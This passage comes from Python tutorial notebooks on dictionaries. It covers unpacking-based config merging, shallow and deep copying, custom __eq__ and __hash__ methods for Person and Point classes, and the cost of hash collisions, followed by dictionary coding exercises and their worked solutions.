Another dictionary is used to configure some global configuration, and another set of dictionaries is used to define environment specific configurations, maybe dev and prod.

In [16]:
conf_defaults = dict.fromkeys(('host', 'port', 'user', 'pwd', 'database'), None)
print(conf_defaults)

{'host': None, 'port': None, 'user': None, 'pwd': None, 'database': None}


In [17]:
conf_global = {
    'port': 5432,
    'database': 'deepdive'}

In [18]:
conf_dev = {
    'host': 'localhost',
    'user': 'test',
    'pwd': 'test'
}

conf_prod = {
    'host': 'prodpg.deepdive.com',
    'user': '$prod_user',
    'pwd': '$prod_pwd',
    'database': 'deepdive_prod'
}

Now we can generate a full configuration for our dev environment this way:

In [19]:
config_dev = {**conf_defaults, **conf_global, **conf_dev}

In [20]:
print(config_dev)

{'host': 'localhost', 'port': 5432, 'user': 'test', 'pwd': 'test', 'database': 'deepdive'}


and a config for our prod environment:

In [21]:
config_prod = {**conf_defaults, **conf_global, **conf_prod}

In [22]:
print(config_prod)

{'host': 'prodpg.deepdive.com', 'port': 5432, 'user': '$prod_user', 'pwd': '$prod_pwd', 'database': 'deepdive_prod'}


##### Example

Another way dictionary unpacking can be really useful, is for passing keyword arguments to a function:

In [23]:
def my_func(*, kw1, kw2, kw3):
    print(kw1, kw2, kw3)

In [24]:
d = {'kw2': 20, 'kw3': 30, 'kw1': 10}

In this case, we don't really care about the order of the elements, since we'll be unpacking keyword arguments:

In [25]:
my_func(**d)

10 20 30


Of course we can even use it this way, but here the dictionary order does matter, as it will be reflected in the order in which those arguments are passed to the function:

In [26]:
def my_func(**kwargs):
    for k, v in kwargs.items():
        print(k, v)

In [27]:
my_func(**d)

kw2 20
kw3 30
kw1 10


As you can see the function's `kwargs` dictionary received the elements in the same order as the original dictionary we unpacked.

#### Copying Dictionaries

We can make copies of dictionaries. But as with iterables, we have to differentiate between **shallow** and **deep** copies.

The `copy` method that dictionaries implement is a shallow copy mechanism.
This means that a new container is created, but the item references within the collection are maintained.

Let's see a simple example:

In [28]:
d = {'a': [1, 2], 'b': [3, 4]}

In [29]:
d1 = d.copy()

In [30]:
print(d)
print(d1)

{'a': [1, 2], 'b': [3, 4]}
{'a': [1, 2], 'b': [3, 4]}


In [31]:
id(d), id(d1), d is d1

(4367368768, 4367467576, False)

So `d` and `d1` are not the same objects, so we can add and remove keys from one dict without affecting the other. Also, we can completely replace an associated value in one without affecting the other.

In [32]:
del d['a']

In [33]:
print(d)
print(d1)

{'b': [3, 4]}
{'a': [1, 2], 'b': [3, 4]}


In [34]:
d['b'] = 100

In [35]:
print(d)
print(d1)

{'b': 100}
{'a': [1, 2], 'b': [3, 4]}


But let's see what happens if we mutate the value of one dictionary:

In [36]:
d = {'a': [1, 2], 'b': [3, 4]}
d1 = d.copy()
print(d)
print(d1)

{'a': [1, 2], 'b': [3, 4]}
{'a': [1, 2], 'b': [3, 4]}


In [37]:
d['a'].append(100)

In [38]:
print(d)

{'a': [1, 2, 100], 'b': [3, 4]}


In [39]:
print(d1)

{'a': [1, 2, 100], 'b': [3, 4]}


As you can see the mutation was also "seen" by `d1`. This is because the objects `d['a']` and `d1['a']` are in fact the **same** objects.

In [40]:
d['a'] is d1['a']

True

So if we have nested dictionaries for example, as is often the case with JSON documents, we have to be careful when creating shallow copies.

In [41]:
d = {'id': 123445,
    'person': {
        'name': 'John',
        'age': 78},
     'posts': [100, 105, 200]
    }

In [42]:
d1 = d.copy()

In [43]:
d1['person']['name'] = 'John Cleese'
d1['posts'].append(300)

In [44]:
d1

{'id': 123445,
 'person': {'name': 'John Cleese', 'age': 78},
 'posts': [100, 105, 200, 300]}

In [45]:
d

{'id': 123445,
 'person': {'name': 'John Cleese', 'age': 78},
 'posts': [100, 105, 200, 300]}

If we want to avoid this issue, we have to create a **deep** copy.
We can easily do this ourselves using recursion, but the `copy` module implements such a function for us:

In [46]:
from copy import deepcopy

In [47]:
d = {'id': 123445,
    'person': {
        'name': 'John',
        'age': 78},
     'posts': [100, 105, 200]
    }

In [48]:
d1 = deepcopy(d)

In [49]:
d1['person']['name'] = 'John Cleese'
d1['posts'].append(300)

In [50]:
d1

{'id': 123445,
 'person': {'name': 'John Cleese', 'age': 78},
 'posts': [100, 105, 200, 300]}

In [51]:
d

{'id': 123445, 'person': {'name': 'John', 'age': 78}, 'posts': [100, 105, 200]}

We saw earlier that we can also copy a dictionary by essentially unpacking the keys of one, or more dictionaries, into another.
This also creates a **shallow** copy:

In [52]:
d1 = {'a': [1, 2], 'b':[3, 4]}
d = {**d1}

In [53]:
d

{'a': [1, 2], 'b': [3, 4]}

In [54]:
d1['a'].append(100)

In [55]:
d1

{'a': [1, 2, 100], 'b': [3, 4]}

In [56]:
d

{'a': [1, 2, 100], 'b': [3, 4]}

At this point you're probably asking yourself, whether to use `**` or `.copy()` to create a shallow copy. We can even create a shallow of one dict by passing the dict to the `dict()` constructor.

Firstly, the `**` unpacking is more flexible because you can unpack multiple dictionaries into a single new one - `copy` is restricted to copying a single dictionary.

But what about timings? Is one faster than the other?

What about using a dictionary comprehension to copy a dictionary? Is that faster/slower?

Let's try it out and see:

In [57]:
from random import randint

big_d = {k: randint(1, 100) for k in range(1_000_000)}

In [58]:
def copy_unpacking(d):
    d1 = {**d}
    
def copy_copy(d):
    d1 = d.copy()

def copy_create(d):
    d1 = dict(d)
    
def copy_comprehension(d):
    d1 = {k: v for k, v in d.items()}

In [59]:
from timeit import timeit

In [60]:
timeit('copy_unpacking(big_d)', globals=globals(), number=100)

2.480969894968439

In [61]:
timeit('copy_copy(big_d)', globals=globals(), number=100)

2.469855136005208

In [62]:
timeit('copy_create(big_d)', globals=globals(), number=100)

2.4125180219998583

In [63]:
timeit('copy_comprehension(big_d)', globals=globals(), number=100)

5.77224236400798

So, creating, unpacking and `.copy()` are about the same - certainly not significant enough to be concerned. A comprehension on the other hand is substantially slower - so, don't use comprehension syntax to do a simple shallow copy!

##  Custom Classes and Hashing

We know that in order for an object to be usable as a key in a dictionary, it must be hashable.
In general Python will not allow mutable types to be hashable. I explained why in previous lectures, but it boils down to key retrieval. 

To retrieve a key/value from a dictionary, we start with the hash of the key, mod (`%`) the size of the dictionary (allocated, not in-use). From that a sequence of search indices is generated (the probe sequence). Python then follows this probe sequence one by one, comparing the requested key with the key at that index, using `==` comparisons (technically it first compares the hasesh themselves, and f they are equal then also compares the keys). If it finds a key which compares equal then it returns that item, otherwise it continues the probe sequence until it either finds the key or sees an empty slot (which means the key does not exist in the dictionary) and bails out of the search.

If we allowed the key to change, then even if it had the same hash (and hence the same probe sequence), Python would not find it unless it still compared equal.

So technically it is not required that the key be immutable, what is required is that the hash and equality of the key does not change!

Remember the difference between equality (`=`) and identity (`is`):

In [1]:
t1 = (1, 2, 3)

In [2]:
t2 = (1, 2, 3)

In [3]:
t1 is t2

False

In [4]:
t1 == t2

True

In [5]:
d = {t1: 100}

In [6]:
d[t1]

100

In [7]:
d[t2]

100

As you can see, even though `t1` and `t2` are different **objects**, we can still retrieve the element from the dictionary using either one - because they compare **equal** to each other, and, in fact, **have the same hash** as well:

In [8]:
hash(t1), hash(t2)

(2528502973977326415, 2528502973977326415)

One of the basic premises of hashes is that if two objects compare equal, they must have the same hash.

What happens when we create custom objects? Are these hashable?
The answer is yes - but our objects could be mutable, how does Python create a hash for these objects then?
It uses the memory address (`id`) of the object to compute a hash.

Also, by default, different instances of a custom class instances will never compare equal, since by default it compares the memory address.

In [9]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [10]:
p1 = Person('John', 78)
p2 = Person('John', 78)

In [11]:
id(p1), id(p2)

(4359101128, 4359101072)

In [12]:
p1 == p2

False

In [13]:
hash(p1), hash(p2)

(-9223372036582331988, 272443817)

Because of this default hash calculation, we can actually use custom objects as keys in dictionaries:

In [14]:
p1 = Person('John', 78)
p2 = Person('Eric', 75)
persons = {p1: 'John object', p2: 'Eric object'}

In [15]:
for k in persons.keys():
    print(k)

Person(name=John, age=78)
Person(name=Eric, age=75)


The problem here is that the **only** way to retrieve John for example, is to request the **original** object as the key (since any other instance, even with the same attribute values would not be equal):

In [16]:
persons[p1]

'John object'

But we cannot retrieve it this way:

In [17]:
p = Person('John', 78)
print(p, id(p))
print(p1, id(p1))

Person(name=John, age=78) 4359141472
Person(name=John, age=78) 4359139736


As you can see they are not the **same** object, they do not compare equal, and their hash is not the same:

In [18]:
p == p1, hash(p), hash(p1)

(False, 272446342, -9223372036582329575)

And so:

In [19]:
persons.get(p, 'not found')

'not found'

This may not be the behavior we want - we might want to be able to retrieve John from the dictionary as long as the contents (or some of the contents) matches - i.e. when do we consider two Person instances **equal**.

To do this we would start by implementing an `__eq__` method in our class:

In [20]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False

In [21]:
p1 = Person('John', 78)
p2 = Person('John', 78)

In [22]:
p1 == p2

True

OK, that's great, so let's put `p1` in a dictionary and see if we can recover it using `p2`, which evaluates to equal to `p1`:

In [23]:
persons = {p1: 'John p1'}

TypeError: unhashable type: 'Person'

Huh? Why is a Person instance suddenly unhashable?

In [25]:
hash(p1)

TypeError: unhashable type: 'Person'

The only thing we changed is we implemented the `__eq__` method. Let's just check:

In [26]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [27]:
hash(Person('John', 78))

272445213

In [28]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False

In [29]:
hash(Person('John', 78))

TypeError: unhashable type: 'Person'

Yes, that's the reason... But why?

Remember what I said earlier, if two objects compare equal (`==`) then their hash should also compare equal.

`p1` and `p2` are distinct objects, but they now compare equal, and if their hash was based on their `id` they would not have equal hashes!

When we implement an `__eq__` method on a class, Python will no longer provide a default hash. Instead it automatically indicates that the class is not hashable.

There is a special method `__hash__` which is used by Python when we call the `hash()` function. If that `__hash__` method **is** `None` then Python considers the object unhashable (note I am not saying the `__hash__` function returns `None`, I am saying it should just **be** `None`)

In [30]:
hash_func = Person.__hash__
print(hash_func)

None


Notice how the __hash__ attribute is `None` - it is not a function that returns `None`.

In fact, we could have done this explicitly ourselves as well:

In [31]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False
    
    __hash__ = None

In [32]:
hash(Person('John', 78))

TypeError: unhashable type: 'Person'

In fact we can use this technique to mark a custom class, even if it does not implement an `__eq__` method as unhashable:

In [33]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    __hash__ = None

In [34]:
hash(Person('John', 78))

TypeError: unhashable type: 'Person'

In this case though, we do want Person instances to be hashable so we can recover Person keys in our dictionary based on whether the objects compare equal or not.
In this case we simply want to create a hash based on `name` and `age`. Since both of these values are themselves hashable it turns out to be pretty easy to do:

In [35]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False
    
    def __hash__(self):
        print('__hash__ called...')
        return hash((self.name, self.age))

In [36]:
p1 = Person('John', 78)
p2 = Person('John', 78)
print(id(p1) is id(p2))
print(p1 == p2)
print(hash(p1) == hash(p2))

False
True
__hash__ called...
__hash__ called...
True


As you can see, `Person` objects are now hashable, and equal objects have equal hashes. Of course, if the objects are not equal they usually will have different hashes (though that is not mandatory - we'll come back to that in a bit).

In [37]:
p3 = Person('Eric', 75)

In [38]:
print(p1 == p3)
print(hash(p1) == hash(p3))

False
__hash__ called...
__hash__ called...
False


Let's just remove that print statement quick:

In [39]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False
    
    def __hash__(self):
        return hash((self.name, self.age))

Now let's see how this works with dictionaries:

In [40]:
p1 = Person('John', 78)
p2 = Person('John', 78)
p3 = Person('Eric', 75)

In [41]:
persons = {p1: 'first John object'}

In [42]:
persons[p1]

'first John object'

In [43]:
persons[p2]

'first John object'

In [44]:
persons[p3]

KeyError: Person(name=Eric, age=75)

Now let's try to add `p2` to the dictionary:

In [45]:
persons[p2] = 'other (equal) John object'

In [46]:
persons

{Person(name=John, age=78): 'other (equal) John object'}

As you can see, we actually just overwrote the value of that key - since those two keys are in fact equal (`==`).

So we could not do this:

In [47]:
persons = {p1: 'p1', p2: 'p2'}

In [48]:
persons

{Person(name=John, age=78): 'p2'}

As you can see the key was considered the same, and hence the last value assignment was effective.

But of course we could do this:

In [49]:
persons = {p1: 'p1', p3: 'p3'}

In [50]:
persons

{Person(name=John, age=78): 'p1', Person(name=Eric, age=75): 'p3'}

since `p1` and `p3` are not equal (`==`).

##### A subtle point about ` __hash__` and `hash()`

The `__hash__` method must return an integer - Python will complain otherwise:

In [51]:
class Test:
    def __hash__(self):
        return 'a string'

In [52]:
hash(Test())

TypeError: __hash__ method should return an integer

Just out of interest:

When we call the `hash()` function, although it in turn calls the `__hash__` method, it does something more.

It will truncate the integer returned by `__hash__` to a certain width which is implementation dependent.

In my case, I can see that hashes will be truncated to 64-bits:

In [53]:
import sys
sys.hash_info.width

64

Let's just see how that affects the results of our `__hash__` method:

In [54]:
class Test:
    def __hash__(self):
        return 1_000_000_000_000_000_000

In [55]:
hash(Test())

1000000000000000000

In [56]:
class Test:
    def __hash__(self):
        return 10_000_000_000_000_000_000

In [57]:
hash(Test())

776627963145224196

In [58]:
mod = sys.hash_info.modulus

In [59]:
mod

2305843009213693951

In [60]:
10_000_000_000_000_000_000 % mod

776627963145224196

##### Back to equal hashes for unequal objects

As we have seen many times now, hash functions and hashable objects need to satisfy these conditions:
1. if a == b then hash(a) == hash(b)
2. hash(a) must be an integer

But nothing specifies here that unequal objects must result in unequal hashes.

The only issue with equal hashes with unequal objects is that we end up getting more collisions when looking up a key in a dictionary (refer to the earlier theory section if you want more details on this)

So, let's try it out with our `Person` class, we are going to implement a hash that is going to be a constant integer. That will still satisfy conditions (1) and (2) above:

In [61]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False
    
    def __hash__(self):
        return 100

In [62]:
p1 = Person('John', 78)
p2 = Person('Eric', 75)

In [63]:
hash(p1), hash(p2)

(100, 100)

In [64]:
p1 == p2

False

In [65]:
persons = {p1: 'p1', p2: 'p2'}

In [66]:
persons

{Person(name=John, age=78): 'p1', Person(name=Eric, age=75): 'p2'}

In [67]:
persons[p1]

'p1'

In [68]:
persons[p2]

'p2'

In [69]:
persons[Person('John', 78)]

'p1'

As you can see that still works just fine.
But let's see how performance is affected by this.
To test this we are going to create a slightly simpler class:

In [70]:
class Number:
    def __init__(self, x):
        self.x = x
        
    def __eq__(self, other):
        if isinstance(other, Number):
            return self.x == other.x
        else:
            return False
    
    def __hash__(self):
        return hash(self.x)        

In [71]:
class SameHash:
    def __init__(self, x):
        self.x = x
        
    def __eq__(self, other):
        if isinstance(other, SameHash):
            return self.x == other.x
        else:
            return False
    
    def __hash__(self):
        return 100   

In [72]:
numbers = {Number(i): 'some value' for i in range(1_000)}
same_hashes = {SameHash(i): 'some value' for i in range(1_000)}

In [73]:
numbers[Number(500)]

'some value'

In [74]:
same_hashes[SameHash(500)]

'some value'

And now let's time how long it takes to retrieve an element from each of those dictionaries:

In [75]:
from timeit import timeit

In [76]:
print(timeit('numbers[Number(500)]', globals=globals(), number=10_000))

0.008118819037918001


In [77]:
print(timeit('same_hashes[SameHash(500)]', globals=globals(), number=10_000))

1.0041481230291538


As you can see it takes substantially longer (by a factor of more than 100x) to look up a value when we have hash collisions.
In fact this is the reason why Python has randomized hashes for strings, dates, and a few other built in types. If these hashes were predictable it would be easy for an attacker to purposefully provide keys with the same hash to slow down the system in a denial of service attack.

So, even though that constant value we provide for a hash is technically valid, I wouldn't recommend you use something like it!!

#### Example

Let's take a look at another practical example of where we might want to use custom hashing.

Let's say we want to write a custom class to handle 2D coordinates:

In [78]:
class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y
        
    def __repr__(self):
        return f'({self.x}, {self.y})'

In [79]:
pt = Point(1, 2)
print(pt)

(1, 2)


In this case, we actually would like to be able to put these points as keys in a dictionary.
We certainly can as it is:

In [80]:
points = {Point(0,0): 'pt 1', Point(1,1): 'pt 2'}

But how do we recover the value for the point (0,0) for example?

In [81]:
points[Point(0,0)]

KeyError: (0, 0)

The problem of course is that Python is using a hash of the id of the points - so we need to implement a custom hash mechanism, and of course also the `__eq__` method (just because the hash of two objects is the same does not mean the objects are also equal, so to look up a key in a dictionary Python needs both a hash and equality).

In [82]:
class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y
        
    def __repr__(self):
        return f'({self.x}, {self.y})'
    
    def __eq__(self, other):
        if isinstance(other, Point):
            return self.x == other.x and self.y == other.y
        else:
            return False
        
    def __hash__(self):
        return hash((self.x, self.y))

In [83]:
points = {Point(0, 0): 'origin', Point(1,1): 'pt at (1,1)'}

In [84]:
points[Point(0,0)]

'origin'

As you can see we now have the desired functionality.

Let's actually take this a step further, and implement things in such a way that we could use a regular 2-element tuple to look up a point in the dictionary.

To do this we'll have to make sure that `(x, y) == Point(x, y)` and of course make sure that in that case we also have equal hashes - but since we are already calculating the hash of a Point as the hash of the corresponding tuple, we're already fine there.

In [85]:
class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y
        
    def __repr__(self):
        return f'({self.x}, {self.y})'
    
    def __eq__(self, other):
        if isinstance(other, tuple) and len(other) == 2:
            other = Point(*other)
        if isinstance(other, Point):
            return self.x == other.x and self.y == other.y
        else:
            return False
        
    def __hash__(self):
        return hash((self.x, self.y))

In [86]:
points = {Point(0,0): 'origin', Point(1,1): 'pt at (1,1)'}

In [87]:
points[Point(0,0)]

'origin'

In [88]:
points[(0,0)]

'origin'

In fact:

In [89]:
(0,0) == Point(0,0)

True

You'll notice that our `Point` class is technically mutable.
So we could do something like this:

In [90]:
pt1 = Point(0,0)
pt2 = Point(1,1)
points = {pt1: 'origin', pt2: 'pt at (1,1)'}

In [91]:
points[pt1], points[Point(0,0)], points[(0,0)]

('origin', 'origin', 'origin')

But what happens if we mutate `pt1`?

In [92]:
pt1.x = 10

In [93]:
pt1

(10, 0)

In [94]:
points[pt1]

KeyError: (10, 0)

So we can't recover our item using `pt1`, that's because the hash of `pt1` has changed, so Python start looking in the wrong place in the dictionary.

Let's see what the items are in the dictionary:

In [95]:
for k, v in points.items():
    print(k, v)

(10, 0) origin
(1, 1) pt at (1,1)


So can we recover that 'origin' point using a different key maybe?

In [96]:
points[Point(10, 0)]

KeyError: (10, 0)

Also not, again because the hash under which the original point `pt1` was stored, is not the same as the new hash for that same object.

This is why we should not use mutable keys in a dictionary!

So, in this case, although we cannot technically enfore immutability, we can use conventions to indicate the object is supposed to be immutable:

In [97]:
class Point:
    def __init__(self, x, y):
        self._x = x
        self._y = y
    
    @property
    def x(self):
        return self._x
    
    @property
    def y(self):
        return self._y
    
    def __repr__(self):
        return f'({self.x}, {self.y})'
    
    def __eq__(self, other):
        if isinstance(other, tuple) and len(other) == 2:
            other = Point(*other)
        if isinstance(other, Point):
            return self.x == other.x and self.y == other.y
        else:
            return False
        
    def __hash__(self):
        return hash((self.x, self.y))

Everything works just as before, but making the underlying attributes `_x` and `_y` indicates these are private and should not be modified directly.
Furthermore we only created attribute getters, not setters for `x` and `y`:

In [98]:
pt = Point(0,0)

In [99]:
pt.x

0

In [100]:
pt.x = 10

AttributeError: can't set attribute

# Section 04 - Coding Exercises

##  Coding Exercises

#### Exercise 1

Write a Python function that will create and return a dictionary from another dictionary, but sorted by value. You can assume the values are all comparable and have a natural sort order.

For example, given the following dictionary:

In [1]:
composers = {'Johann': 65, 'Ludwig': 56, 'Frederic': 39, 'Wolfgang': 35}

Your function should return a dictionary that looks like the following:

In [2]:
sorted_composers = {'Wolfgang': 35,
                    'Frederic': 39, 
                    'Ludwig': 56,
                    'Johann': 65}

Remember if you are using Jupyter notebook to use `print()` to view your dictionary in it's natural ordering (in case Jupyter displays your dictionary sorted by key).

Also try to keep your code Pythonic - i.e. don't start with an empty dictionary and build it up one key at a time - look for a different, more Pythonic, way of doing it. 

Hint: you'll likely want to use Python's `sorted` function.

---

#### Exercise 2

Given two dictionaries, `d1` and `d2`, write a function that creates a dictionary that contains only the keys common to both dictionaries, with values being a tuple containg the values from `d1` and `d2`. (Order of keys is not important).

For example, given two dictionaries as follows:

In [3]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'b': 20, 'c': 30, 'y': 40, 'z': 50}

Your function should return a dictionary that looks like this:

In [4]:
d = {'b': (2, 20), 'c': (3, 30)}

Hint: Remember that `s1 & s2` will return the intersection of two sets.

Again, try to keep your code Pythonic - don't just start with an empty dictionary and build it up one by one - think of a cleaner approach.

---

#### Exercise 3

You have text data spread across multiple servers.
Each server is able to analyze this data and return a dictionary that contains words and their frequency.

Your job is to combine this data to create a single dictionary that contains all the words and their combined frequencies from all these data sources. Bonus points if you can make your dictionary sorted by frequency (highest to lowest).

For example, you may have three servers that each return these dictionaries:

In [5]:
d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}
d3 = {'erlang': 5, 'haskell': 2, 'python': 1, 'pascal': 1}

Your resulting dictionary should look like this:

In [6]:
d = {'python': 17,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10,
     'go': 9,
     'erlang': 5,
     'haskell': 2,
     'pascal': 1}

If only servers 1 and 2 return data (so d1 and d2), your results would look like:

In [7]:
d = {'python': 16,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10, 
     'go': 9}

---

#### Exercise 4

For this exercise suppose you have a web API load balanced across multiple nodes. This API receives various requests for resources and logs each request to some local storage. Each instance of the API is able to return a dictionary containing the resource that was accessed (the dictionary key) and the number of times it was requested (the associated value).

Your task here is to identify resources that have been requested on some, but not all the servers, so you can determine if you have an issue with your load balancer not distributing certain resource requests across all nodes.

For simplicity, we will assume that there are exactly 3 nodes in the cluster.

You should write a function that takes 3 dictionaries as arguments for node 1, node 2, and node 3, and returns a dictionary that contains only keys that are not found in **all** of the dictionaries. The value should be a list containing the number of times it was requested in each node (the node order should match the dictionary (node) order passed to your function). Use `0` if the resource was not requested from the corresponding node.

Suppose your dictionaries are for logs of all the GET requests on each node:

In [8]:
n1 = {'employees': 100, 'employee': 5000, 'users': 10, 'user': 100}
n2 = {'employees': 250, 'users': 23, 'user': 230}
n3 = {'employees': 150, 'users': 4, 'login': 1000}

Your result should then be:

In [9]:
result = {'employee': (5000, 0, 0),
          'user': (100, 230, 0),
          'login': (0, 0, 1000)}

Tip: 
to find the difference between two sets, you can subtract one from the other:

In [10]:
s1 = {1, 2, 3, 4}
s2 = {1, 2, 3}
s1 - s2

{4}

Tip: to get the union of two (or more) sets you can use the `|` operator:

In [11]:
s1 = {1, 2, 3}
s2 = {2, 3, 4}
s1 | s2

{1, 2, 3, 4}

Tip: to get the intersection of two (or more) sets you can use the `&` operator:

In [12]:
s1 = {1, 2, 3, 4}
s2 = {2, 3}
s1 & s2

{2, 3}

Hint: It might be helpful to draw out a set diagram and consider what subset you are trying to isolate.

##  Coding Exercises - Solution 1

#### Exercise 1

Write a Python function that will create and return a dictionary from another dictionary, but sorted by value. You can assume the values are all comparable and have a natural sort order.

For example, given the following dictionary:

In [1]:
composers = {'Johann': 65, 'Ludwig': 56, 'Frederic': 39, 'Wolfgang': 35}

Your function should return a dictionary that looks like the following:

In [2]:
sorted_composers = {'Wolfgang': 35,
                    'Frederic': 39, 
                    'Ludwig': 56,
                    'Johann': 65}

Remember if you are using Jupyter notebook to use `print()` to view your dictionary in it's natural ordering (Jupyter will display your dictionary sorted by key).

Also try to keep your code Pythonic - i.e. don't start with an empty dictionary and build it up one key at a time - look for a different, more Pythonic, way of doing it. 

Hint: you'll likely want to use Python's `sorted` function.

##### Solution

My approach here is to sort the `items()` view using Python's `sorted` function and a custom `key` that uses the dictionary values (or second element of each tuple in the `items` view):

In [3]:
composers = {'Johann': 65, 'Ludwig': 56, 'Frederic': 39, 'Wolfgang': 35}

def sort_dict_by_value(d):
    d = {k: v
        for k, v in sorted(d.items(), key=lambda el: el[1])}
    return d

In [4]:
print(sort_dict_by_value(composers))

{'Wolfgang': 35, 'Frederic': 39, 'Ludwig': 56, 'Johann': 65}


Here's a better approach - instead of using a dictionary comprehension, we can simply use the `dict()` function to create a dictionary from the sorted tuples!

In [5]:
def sort_dict_by_value(d):
    return dict(sorted(d.items(), key=lambda el: el[1]))

And we end up with the same end result:

In [6]:
sort_dict_by_value(composers)

{'Wolfgang': 35, 'Frederic': 39, 'Ludwig': 56, 'Johann': 65}

##  Coding Exercises - Solution 2

#### Exercise 2

Given two dictionaries, `d1` and `d2`, write a function that creates a dictionary that contains only the keys common to both dictionaries, with values being a tuple containg the values from `d1` and `d2`. (Order of keys is not important).

For example, given two dictionaries as follows:

In [1]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'b': 20, 'c': 30, 'y': 40, 'z': 50}

Your function should return a dictionary that looks like this:

In [2]:
d = {'b': (2, 20), 'c': (3, 30)}

Hint: Remember that `s1 & s2` will return the intersection of two sets.

Again, try to keep your code Pythonic - don't just start with an empty dictionary and build it up one by one - think of a cleaner approach.

##### Solution

My approach here is to use set intersections to find the keys common to both dictionaries.
Then I use a dictionary comprehension to build up my new dictionary, making each value in the new dictionary a tuple containing the values from the original dictionaries:

In [3]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'b': 20, 'c': 30, 'y': 40, 'z': 50}

def intersect(d1, d2):
    d1_keys = d1.keys()
    d2_keys = d2.keys()
    keys = d1_keys & d2_keys
    d = {k: (d1[k], d2[k]) for k in keys}
    return d

In [4]:
intersect(d1, d2)

{'b': (2, 20), 'c': (3, 30)}

##  Coding Exercises - Solution 3

#### Exercise 3

In [1]:
d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}
d3 = {'erlang': 5, 'haskell': 2, 'python': 1, 'pascal': 1}

Your resulting dictionary should look like this:

In [2]:
d = {'python': 17,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10,
     'go': 9,
     'erlang': 5,
     'haskell': 2,
     'pascal': 1}

If only servers 1 and 2 return data (so d1 and d2), your results would look like:

In [3]:
d = {'python': 16,
     'javascript': 15,
     'java': 13,
     'c#': 12,
     'c++': 10, 
     'go': 9}

##### Solution

My approach here is to first create a combined dictionary that contains all the keys from all the dictionaries, and adds the values together if the key exists in more than one dictionary.
I do this by looping through all the dictionaries and all the items in each of those dictionaries.
You could do this instead by first getting all the keys and unioning them to create a dictionary with just the keys, but then you would still have to lookup each key in each dictionary to see if it is present - that's three lookups for each key (or as many lookups as we have input dictionaries) - I think it's probably more efficient to just take the first approach I mention.

Then in a second phase, I create a new dictionary based on the one I just created to have it sorted by the value.

In [4]:
d1 = {'python': 10, 'java': 3, 'c#': 8, 'javascript': 15}
d2 = {'java': 10, 'c++': 10, 'c#': 4, 'go': 9, 'python': 6}
d3 = {'erlang': 5, 'haskell': 2, 'python': 1, 'pascal': 1}

def merge(*dicts):
    unsorted = {}
    for d in dicts:
        for k, v in d.items():
            unsorted[k] = unsorted.get(k, 0) + v
            
    # create a dictionary sorted by value
    return dict(sorted(unsorted.items(), key=lambda e: e[1], reverse=True))

In [5]:
merged = merge(d1, d2, d3)
for k, v in merged.items():
    print(k, v)

python 17
javascript 15
java 13
c# 12
c++ 10
go 9
erlang 5
haskell 2
pascal 1


In [6]:
merged = merge(d1, d2)
for k, v in merged.items():
    print(k, v)

python 16
javascript 15
java 13
c# 12
c++ 10
go 9


##  Coding Exercises - Solution 4

#### Exercise 4

For this exercise suppose you have a web API load balanced across multiple nodes. This API receives various requests for resources and logs each request to some local storage. Each instance of the API is able to return a dictionary containing the resource that was accessed (the dictionary key) and the number of times it was requested (the associated value).

Your task here is to identify resources that have been requested on some, but not all the servers, so you can determine if you have an issue with your load balancer not distributing certain resource requests across all nodes.

For simplicity, we will assume that there are exactly 3 nodes in the cluster.

You should write a function that takes 3 dictionaries as arguments for node 1, node 2, and node 3, and returns a dictionary that contains only keys that are not found in **all** of the dictionaries. The value should be a list containing the number of times it was requested in each node (the node order should match the dictionary (node) order passed to your function). Use `0` if the resource was not requested from the corresponding node.

Suppose your dictionaries are for logs of all the GET requests on each node:

In [1]:
n1 = {'employees': 100, 'employee': 5000, 'users': 10, 'user': 100}
n2 = {'employees': 250, 'users': 23, 'user': 230}
n3 = {'employees': 150, 'users': 4, 'login': 1000}

Your result should then be:

In [2]:
result = {'employee': (5000, 0, 0),
          'user': (100, 230, 0),
          'login': (0, 0, 1000)}

Tip: 
to find the difference between two sets, you can subtract one from the other:

In [3]:
